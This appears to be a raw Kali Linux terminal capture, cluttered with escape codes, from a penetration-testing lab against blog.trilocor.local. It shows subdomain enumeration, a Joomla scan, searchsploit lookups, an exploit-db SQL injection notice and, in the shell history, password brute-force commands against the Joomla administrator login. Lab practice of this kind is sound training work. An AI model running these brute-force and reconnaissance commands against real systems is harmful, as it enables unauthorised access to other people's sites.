#[6C#[32mpython#[39m#[90m3 subbrute.py trilocor.local --subs
/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --resolvers
new_resolvers.txt#[39m#[K#[1C[8:25:03]#[0m#[142D##[32mn#[32m2#[39m#[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[131D
#[J#[0;1;2mcommand#[0m
#[J#[0mpython2 #[Jpython2.7 #[Jpython2.7-
config#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mpython2#[39m#[K#[132C[8:25:03]#[0m#[141D##[32m2#[32m.#[39m#[8D#[1m#[31mp#[
1m#[31my#[1m#[31mt#[1m#[31mh#[1m#[31mo#[1m#[31mn#[1m#[31m2#[1m#[31m.#[0m#[39m#[30m#
[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mcommand#[0m
#[0mpython2.7 python2.7-config
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mpython2.7#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mpython2.#[0m#[39m#[K#[131C[8:25:03]#[0m#[140D##[1m#[31m.#[1m#[31m7#[0m
#[39m#[9D#[0m#[32mp#[0m#[32my#[0m#[32mt#[0m#[32mh#[0m#[32mo#[0m#[32mn#[0m#[32m2#[0m
#[32m.#[0m#[32m7#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mpython2.7 #[Jpython2.7-config#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mpython2.7#[39m#[K#[130C[8:25:03]#[0m#[139D##[32m7#[32m #[39m
#[J#[A#[16C###[32m7#[39m#[39m
#[J#[0;1;2mfile#[0m
#[01;32mcomptotestdb.txt#[0m* joomlascan.py #[01;32mLICENSE#[0m*
#[01;32mREADME.md#[0m*
#[0;1;2mPython script#[0m
#[J#[0mjoomlascan.py#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32mpython2.7#[39m#[K#[130C[8:25:03]#[0m#[138Dj##[4mj#[24m#[30m#[103m#[39m#[49
m#[30m#[103m#[39m#[49m
#[J#[0;1;2mfile#[0m
#[0mjoomlascan.py
#[0;1;2mPython script#[0m
#[0mjoomlascan.py
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mjoomlascan.py#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[32mpython2.7#[39m
#[4mj#[24m#[K#[128C[8:25:03]#[0m#[137D##[4mj#[4mo#[24m#[30m#[103m#[39m#[49m#[30m#[1
03m#[39m#[49m
#[J#[0;1;2mfile#[0m
#[0mjoomlascan.py
#[0;1;2mPython script#[0m
#[0mjoomlascan.py
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mjoomlascan.py#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[32mpython2.7#[39m
#[4mjo#[24m#[K#[127C[8:25:03]#[0m#[136D##[4mo#[4mo#[24m#[30m#[103m#[39m#[49m#[30m#[
103m#[39m#[49m
#[J#[0;1;2mfile#[0m
#[0mjoomlascan.py
#[0;1;2mPython script#[0m
#[0mjoomlascan.py
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mjoomlascan.py#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[32mpython2.7#[39m
#[4mjoo#[24m#[K#[126C[8:25:03]#[0m#[135D##[4mo#[4mm#[24m#[30m#[103m#[39m#[49m#[30m#
[103m#[39m#[49m
#[J#[0;1;2mfile#[0m
#[0mjoomlascan.py
#[0;1;2mPython script#[0m
#[0mjoomlascan.py
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mjoomlascan.py#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[32mpython2.7#[39m #[4mjoom#[24m#[K#[125C[8:25:03]#[0m#[134D
#[J#[A#[20C##[4mm#[4mlascan.py#[24m
#[J#[0;1;2mfile#[0m
#[0mjoomlascan.py
#[0;1;2mPython script#[0m
#[J#[0mjoomlascan.py#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32mpython2.7#[39m
#[4mjoomlascan.py#[24m#[K#[116C[8:25:03]#[0m#[125D##[4my#[4m #[24m
#[J#[A#[30C###[4my#[24m#[24m
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mpython2.7#[39m #[4mjoomlascan.py#[24m#[K#[116C[8:25:03]#[0m#[124D-
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mpython2.7#[39m #[4mjoomlascan.py#[24m -u#[K#[113C[8:25:03]#[0m#[121Dh
#[J#[A#[59C
#[J#]2;python2.7 joomlascan.py -u
http://blog.trilocor.local##]1;python2.7#------------------------------------------
-
Joomla Scan
Usage: python joomlascan.py <target>
Version 0.5beta - Database Entries 1235
created by Andrea Draghetti
-------------------------------------------
Robots file found: > http://blog.trilocor.local/robots.txt
No Error Log found
#[0;1;2mcommand#[0m
#[0msakis3g samba_downgrade_db samba-log-parser samba-regedit
samba-tool scanimage scriptlive
sdiff sed see select-default-
wordlist sensortag seq setleds
setmetamode setpriv sha1sum sha256deep
sha384sum shasum shodan
showconsolefont showkey SIPdump slattach
sleep smbcquotas smbd
smbtar snmpbulkwalk snmpgetnext snmpkey
snmpnetstat snmpstatus snmptest
snmpwalk software-properties-qt spa-json-dump speech-dispatcher
spiderfoot spiderfoot-cli splitfont
sqlite3 ssh ssh-add sshd
ssh-keygen ssh-keyscan sslh
sslscan sspr2john startplasma-wayland stl2gts
sudoedit sum sumtool
sunrpcfuzz svlc svn svnauthz
svnbench svnsync swapoff
switch_root sync systemd systemd-cgls
systemd-confext systemd-escape systemd-stdio-bridge
#[J#[30m#[104m(MORE)#[39m#[49m#[12A#[0m#[27m#[24m#[0m
#[6C#[1m#[31ms#[0m#[39m#[90mudo python2.7 -m pip install
urllib3#[39m#[K#[102C[8:27:21]#[0m#[147D##[1m#[31ms#[1m#[31me#[0m#[39m#[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[35D#[90marchsploit joomla 4.1#[39m#[21D
#[J#[0;1;2mcommand#[0m
#[0msearchsploit seclists sed see
select select-default-ispell select-default-iwrap
select-default-wordlist select-editor semver sendemail
sendEmail sendmsrpc sense2john
sensible-browser sensible-editor sensible-pager sensible-terminal
sensors sensors-conf-convert sensors-detect
sensortag sepdebugcrcfix seq serve_image
service servicemenuinstaller sessreg
set setarch setcap setcifsacl
setfacl setfattr setfont
setkeycodes setleds setlogcons setmetamode
se-toolkit setoolkit setopt
setpci setpriv setsid setterm
setupcon setvesablank setvtrgb
#[Jsetxkbmap #[J
#[9A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mse#[0m#[39m#[90marchsploit joomla
4.1#[39m#[K#[116C[8:27:21]#[0m#[146D###[1m#[31ms#[1m#[31me#[1m#[31ma#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msea#[0m#[39m#[90mrchsploit joomla
4.1#[39m#[K#[116C[8:27:21]#[0m#[145D##[1m#[31ma#[1m#[31mr#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msear#[0m#[39m#[90mchsploit joomla
4.1#[39m#[K#[116C[8:27:21]#[0m#[144D##[1m#[31mr#[1m#[31mc#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearc#[0m#[39m#[90mhsploit joomla
4.1#[39m#[K#[116C[8:27:21]#[0m#[143D##[1m#[31mc#[1m#[31mh#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearch#[0m#[39m#[90msploit joomla
4.1#[39m#[K#[116C[8:27:21]#[0m#[142D##[1m#[31mh#[1m#[31ms#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchs#[0m#[39m#[90mploit joomla
4.1#[39m#[K#[116C[8:27:21]#[0m#[141D##[1m#[31ms#[1m#[31mp#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchsp#[0m#[39m#[90mloit joomla
4.1#[39m#[K#[116C[8:27:21]#[0m#[140D##[1m#[31mp#[1m#[31ml#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchspl#[0m#[39m#[90moit joomla
4.1#[39m#[K#[116C[8:27:21]#[0m#[139D##[1m#[31ml#[1m#[31mo#[0m#[39m##[1m#[31mo#[1m#[
31mi#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchsploi#[0m#[39m#[90mt joomla
4.1#[39m#[K#[116C[8:27:21]#[0m#[137D##[1m#[31mi#[1m#[31mt#[0m#[39m#[12D#[0m#[32ms#[
0m#[32me#[0m#[32ma#[0m#[32mr#[0m#[32mc#[0m#[32mh#[0m#[32ms#[0m#[32mp#[0m#[32ml#[0m#
[32mo#[0m#[32mi#[0m#[32mt#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m#[90m joomla
4.1#[39m#[K#[116C[8:27:21]#[0m#[136D##[32mt#[32m #[39m
#[J#[A#[19C###[32mt#[39m#[39m
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m #[90mjoomla
4.1#[39m#[K#[116C[8:27:21]#[0m#[135D#[39mc#[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[9D##[4mc#[24m
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m*#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m #[4mc#[24m#[K#[125C[8:27:21]#[0m#[134D##[4mc#[4mo#[24m
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m*#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m #[4mco#[24m#[K#[124C[8:27:21]#[0m#[133D##[4mo#[4mm#[24m
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m*#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m
#[4mcom#[24m#[K#[123C[8:27:21]#[0m#[132D##[4mm#[4m_#[24m#####[24mc#[24mo#[24mm#[24m
_
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m*#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m com_#[K#[122C[8:27:21]#[0m#[131Dcontact#[?1l#>#[?2004l
#[J#[A#[30C
#[J#]2;searchsploit
com_contact##]1;searchsploit#------------------------------------------------------
-------------------------------------------------------------------
---------------------------------
Exploit Title
| Path
-----------------------------------------------------------------------------------
-------------------------------------- ---------------------------------
Limbo CMS 1.0.4.2L - '#[01;31m#[Kcom_contact#[m#[K' Remote Code Execution
| php/webapps/2370.php
-----------------------------------------------------------------------------------
-------------------------------------- ---------------------------------
Shellcodes: No Results
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools/JoomlaScan-master##]1;..laScan-master##]7;file:///home/kali/
Tools/JoomlaScan-master#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/JoomlaScan-
master#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m951#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:27:39]#[148D#[?1h#=#[?
2004h
Loading...#[K#[A#####[32msearchsploit#[39m com_contact#[1m;#[0m#[1B
#[K#[A#[31C#[1B
#[2m #[0m#[2m912#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m913#[0m#[2m #[0msudo gem install bundler && bundle install
#[K#[K
#[2m #[0m#[2m914#[0m#[2m #[0msudo apt-get install --yes ruby
#[K#[K
#[2m #[0m#[2m915#[0m#[2m #[0msudo gem install bundler && bundle install
#[K#[K
#[2m #[0m#[2m916#[0m#[2m #[0msudo gem install bundler
#[K#[K
#[2m #[0m#[2m917#[0m#[2m #[0msudo bundle install
#[K#[K
#[2m #[0m#[2m918#[0m#[2m* #[0msearchsploit joomla
#[K#[K
#[2m #[0m#[2m919#[0m#[2m* #[0msearchsploit joomla 4.1
#[K#[K
#[2m #[0m#[2m920#[0m#[2m #[0mjoomlavs.rb --url blog.trilocor.local --scan--
components
#[K#[K
#[2m #[0m#[2m921#[0m#[2m #[0mcd ../
#[K#[K
#[2m #[0m#[2m922#[0m#[2m #[0mgit clone https://github.com/ajnik/joomla-bruteforce
#[K#[K
#[2m #[0m#[2m923#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m924#[0m#[2m #[0mcd joomla-bruteforce
#[K#[K
#[2m #[0m#[2m925#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m926#[0m#[2m #[0msudo python3 joomla-brute.py -u blog.trilocor.local
-w /usr/share/seclists/Passwords/500-worst-passwords.txt -usr
~/CPTS/NIX01/user_list.txt #[K#[K
#[2m #[0m#[2m927#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr ~/CPTS/NIX01/user_list.txt#[K#[K
#[2m #[0m#[2m928#[0m#[2m #[0msudo python3 joomla-brute.py
#[K#[K
#[2m #[0m#[2m929#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-U ~/CPTS/NIX01/user_list.txt #[K#[K
#[2m #[0m#[2m930#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local/administrator -w /usr/share/seclists/Passwords/500-
worst-passwords.txt -U ~/CPTS/NIX01/u#[K#[K
#[2m #[0m#[2m931#[0m#[2m* #[0mifconfig
#[K#[K
#[2m #[0m#[2m932#[0m#[2m #[0msudo python3 joomla-brute.py -u blog.trilocor.local
-w /usr/share/seclists/Passwords/500-worst-passwords.txt -usr admin
#[K#[K
#[2m #[0m#[2m933#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr admin #[K#[K
#[2m #[0m#[2m934#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr root #[K#[K
#[2m #[0m#[2m935#[0m#[2m #[0msudo python2.7 -m pip install urllib3
#[K#[K
#[2m #[0m#[2m936#[0m#[2m #[0mpip install urllib3
#[K#[K
#[2m #[0m#[2m937#[0m#[2m #[0mpip install certifi
#[K#[K
#[2m #[0m#[2m938#[0m#[2m #[0mpip install bs4
#[K#[K
#[2m #[0m#[2m939#[0m#[2m #[0mcd ../
#[K#[K
#[2m #[0m#[2m940#[0m#[2m #[0mwhatis gh
#[K#[K
#[2m #[0m#[2m941#[0m#[2m #[0mgithub repo clone drego85/JoomlaScan
#[K#[K
#[2m #[0m#[2m942#[0m#[2m #[0mcd ../Downloads
#[K#[K
#[2m #[0m#[2m943#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m944#[0m#[2m #[0munzip JoomlaScan-master.zip
#[K#[K
#[2m #[0m#[2m945#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m946#[0m#[2m #[0mmv JoomlaScan-master ../Tools
#[K#[K
#[2m #[0m#[2m947#[0m#[2m #[0mcd ../Tools/JoomlaScan-master
#[K#[K
#[2m #[0m#[2m948#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m949#[0m#[2m #[0mpython2.7 joomlascan.py -u
http://blog.trilocor.local
#[K#[K
#[J#[7m 950 searchsploit com_contact
#[0m#[K#[J#[39A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m com_contact#[1m;#[0m#[K#[114C[8:27:39]#[0m#[123D
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m*#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m
com_#[90mcontact#[39m#[K#[115C[8:27:39]#[0m#[131D#[39mc#[39mo#[39mn#[39mt#[39me#[39
m #[39m ##nt#[?1l#>#[?2004l
#[J#[A#[30C
#[J#]2;searchsploit
com_content##]1;searchsploit#------------------------------------------------------
-------------------------------------------------------------------
---------------------------------
Exploit Title
| Path
-----------------------------------------------------------------------------------
-------------------------------------- ---------------------------------
Joomla! Component #[01;31m#[Kcom_Content#[m#[KBlogList - SQL Injection
| php/webapps/11236.txt
-----------------------------------------------------------------------------------
-------------------------------------- ---------------------------------
Shellcodes: No Results
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools/JoomlaScan-master##]1;..laScan-master##]7;file:///home/kali/
Tools/JoomlaScan-master#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/JoomlaScan-
master#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m952#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:27:48]#[148D#[?1h#=#[?
2004hl##[32ml#[39m##[32ml#[39m#[90ms#[39m##[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49
m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mlaudanum ld ldapdelete
lefty lesskey
libsixel-config light-locker line_send_tcp
linguist lion2john
llvm-cvtres-14 llvm-cvtres-15 llvm-cvtres-16
llvm-gsymutil-14 llvm-gsymutil-15
llvm-gsymutil-16 llvm-install-name-tool-14 llvm-install-name-tool-15
llvm-install-name-tool-16 llvm-jitlink-executor-14
llvm-jitlink-executor-15 llvm-jitlink-executor-16 llvm-lto-14
llvm-lto-15 llvm-lto-16
llvm-modextract-14 llvm-modextract-15 llvm-modextract-16
llvm-nm-14 llvm-nm-15
llvm-nm-16 llvm-otool-14 llvm-otool-15
llvm-otool-16 llvm-symbolizer-14
llvm-symbolizer-15 llvm-symbolizer-16 ln
lnstat localectl
locale-gen lofromtemplate login
loginctl lotus2john
lowriter lp lpmove
lp_solve ls
lsblk lspgpot lwp-dump
lwp-request lzegrep
lzless
#[J#[30m#[104m(MORE)#[39m#[49m#[14A#[0m#[27m#[24m#[0m
#[6C#[32ml#[39m#[90ms#[39m#[K#[137C[8:27:48]#[0m#[147D##[32ml#[32mo#[39m###[1m#[31m
l#[1m#[31mo#[0m#[39m#[90mcate joomlavs.rb#[39m#[16D
#[J#[0;1;2mcommand#[0m
#[0mloadkeys loadunimap lobase local localc locale localectl
localedef locale-gen locate lodraw loffice lofromtemplate log
logger login loginctl logname logout logresolve logrotate logsave
loimpress lomath look lookandfeeltool losetup lotus2john
#[Jloweb #[Jlowntfs-3g #[Jlowriter #[J
#[4A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mlo#[0m#[39m#[90mcate
joomlavs.rb#[39m#[K#[121C[8:27:48]#[0m#[146D###[1m#[31ml#[1m#[31mo#[1m#[31mc#[0m#[3
9m##[1m#[31mc#[1m#[31ma#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mlocal #[Jlocalc #[Jlocale #[Jlocalectl #[Jlocaledef
#[Jlocale-gen #[Jlocate #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mloca#[0m#[39m#[90mte
joomlavs.rb#[39m#[K#[121C[8:27:48]#[0m#[144D##[1m#[31ma#[1m#[31mt#[0m#[39m##[1m#[31
mt#[1m#[31me#[0m#[39m#######[0m#[32ml#[0m#[32mo#[0m#[32mc#[0m#[32ma#[0m#[32mt#[0m#[
32me#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mlocate#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mlocate#[39m#[90m joomlavs.rb#[39m#[K#[121C[8:27:48]#[0m#[142D##[32me#[32m
#[39m
#[J#[A#[13C###[32me#[39m#[39m
#[J#[J#[0;1;2mpattern#[0m#[A#[0m#[27m#[24m#[0m
#[6C#[32mlocate#[39m #[90mjoomlavs.rb#[39m#[K#[121C[8:27:48]#[0m#[141D#[39m1#[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[10D
#[J#[J#[0;1;2mpattern#[0m#[A#[0m#[27m#[24m#[0m
#[6C#[32mlocate#[39m 1#[K#[131C[8:27:48]#[0m#[140D1
#[J#[J#[0;1;2mpattern#[0m#[A#[0m#[27m#[24m#[0m
#[6C#[32mlocate#[39m 11#[K#[130C[8:27:48]#[0m#[139D2
#[J#[J#[0;1;2mpattern#[0m#[A#[0m#[27m#[24m#[0m
#[6C#[32mlocate#[39m 112#[K#[129C[8:27:48]#[0m#[138D3
#[J#[J#[0;1;2mpattern#[0m#[A#[0m#[27m#[24m#[0m
#[6C#[32mlocate#[39m 1123#[K#[128C[8:27:48]#[0m#[137D6
#[J#[J#[0;1;2mpattern#[0m#[A#[0m#[27m#[24m#[0m
#[6C#[32mlocate#[39m 11236#[K#[127C[8:27:48]#[0m#[136D.
#[J#[J#[0;1;2mpattern#[0m#[A#[0m#[27m#[24m#[0m
#[6C#[32mlocate#[39m 11236.#[K#[126C[8:27:48]#[0m#[135Dt
#[J#[J#[0;1;2mpattern#[0m#[A#[0m#[27m#[24m#[0m
#[6C#[32mlocate#[39m 11236.t#[K#[125C[8:27:48]#[0m#[134Dx
#[J#[J#[0;1;2mpattern#[0m#[A#[0m#[27m#[24m#[0m
#[6C#[32mlocate#[39m 11236.tx#[K#[124C[8:27:48]#[0m#[133Dt
#[J#[J#[0;1;2mpattern#[0m#[A#[0m#[27m#[24m#[0m
#[6C#[32mlocate#[39m 11236.txt#[K#[123C[8:27:48]#[0m#[132D#[?1l#>#[?2004l
#[J#[A#[22C
#[J#]2;locate
11236.txt##]1;locate#/usr/share/exploitdb/exploits/php/webapps/11236.txt
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools/JoomlaScan-master##]1;..laScan-master##]7;file:///home/kali/
Tools/JoomlaScan-master#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/JoomlaScan-
master#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m953#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:27:57]#[148D#[?1h#=#[?
2004hc##[4mc#[24m##[4mc#[24m#[90md ../Tools/JoomlaScan-
master#[39m#[28D##[4mc#[39m#[4ma#[24m#[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m
#[27D###[24m#[1m#[31mc#[24m#[1m#[31ma#[0m#[39m#[90mt Tab1.txt | grep smtp-
user#[39m#[27D
#[0;1;2mcommand#[0m
#[0mcacaclock cacademo cacafire cacaplay cacaserver cacaview cachepic
cadaver calc_stat callgrind_annotate callgrind_control cancel capinfos
#[Jcapsh #[Jcaptoinfo #[Jcaptype #[Jcardos-tool #[Jcase #[Jcat
#[Jcatdoc #[Jcatfish #[Jcatman #[Jcatppt #[J
#[3A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mca#[0m#[39m#[90mt Tab1.txt | grep smtp-
user#[39m#[K#[110C[8:27:57]#[0m#[146D###[1m#[31mc#[1m#[31ma#[1m#[31mt#[0m#[39m####[
0m#[32mc#[0m#[32ma#[0m#[32mt#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mcat #[Jcatdoc #[Jcatfish #[Jcatman #[Jcatppt
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcat#[39m#[90m Tab1.txt | grep smtp-
user#[39m#[K#[110C[8:27:57]#[0m#[145D##[32mt#[32m #[39m
#[J#[A#[10C###[32mt#[39m#[39m
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcat#[39m #[90mTab1.txt | grep smtp-
user#[39m#[K#[110C[8:27:57]#[0m#[144D#####[39m/#[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[28D#/usr/share/exploitdb/exploits/php/webapps/11236.txt#[51Dcat
#[7m/#[7mu#[7ms#[7mr#[7m/#[7ms#[7mh#[7ma#[7mr#[7me#[7m/#[7me#[7mx#[7mp#[7ml#[7mo#[7
mi#[7mt#[7md#[7mb#[7m/#[7me#[7mx#[7mp#[7ml#[7mo#[7mi#[7mt#[7ms#[7m/
#[7mp#[7mh#[7mp#[7m/#[7mw#[7me#[7mb#[7ma#[7mp#[7mp#[7ms#[7m/
#[7m1#[7m1#[7m2#[7m3#[7m6#[7m.txt#[27m#[51D#[27m/#[27mu#[27ms#[27mr#[27m/
#[27ms#[27mh#[27ma#[27mr#[27me#[27m/
#[27me#[27mx#[27mp#[27ml#[27mo#[27mi#[27mt#[27md#[27mb#[27m/
#[27me#[27mx#[27mp#[27ml#[27mo#[27mi#[27mt#[27ms#[27m/#[27mp#[27mh#[27mp#[27m/
#[27mw#[27me#[27mb#[27ma#[27mp#[27mp#[27ms#[27m/
#[27m1#[27m1#[27m2#[27m3#[27m6#[27m.#[27mt#[27mx#[27mt#[90mTab#[39m#[90m1.txt |
grep smtp-user#[39m#[25D#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[25D#[55D#[32mc#[32ma#[32mt#[39m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4me#[4mx#[4mp#[4ml#[4mo#[4
mi#[4mt#[4md#[4mb#[4m/#[4me#[4mx#[4mp#[4ml#[4mo#[4mi#[4mt#[4ms#[4m/
#[4mp#[4mh#[4mp#[4m/#[4mw#[4me#[4mb#[4ma#[4mp#[4mp#[4ms#[4m/
#[4m1#[4m1#[4m2#[4m3#[4m6#[4m.#[4mt#[4mx#[4mt#[24m#[?1l#>#[?2004l
#[J#[A#[61C
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> DESCRIPTION: Multiple input vars are vulnerable to SQL code injection.
[~]>> AFFECTED VERSIONS: Confirmed in 1.5 but probably other versions also.
[~]>> RISK: High/Medium
[~]>> IMPACT: Execute Arbitrary SQL queries
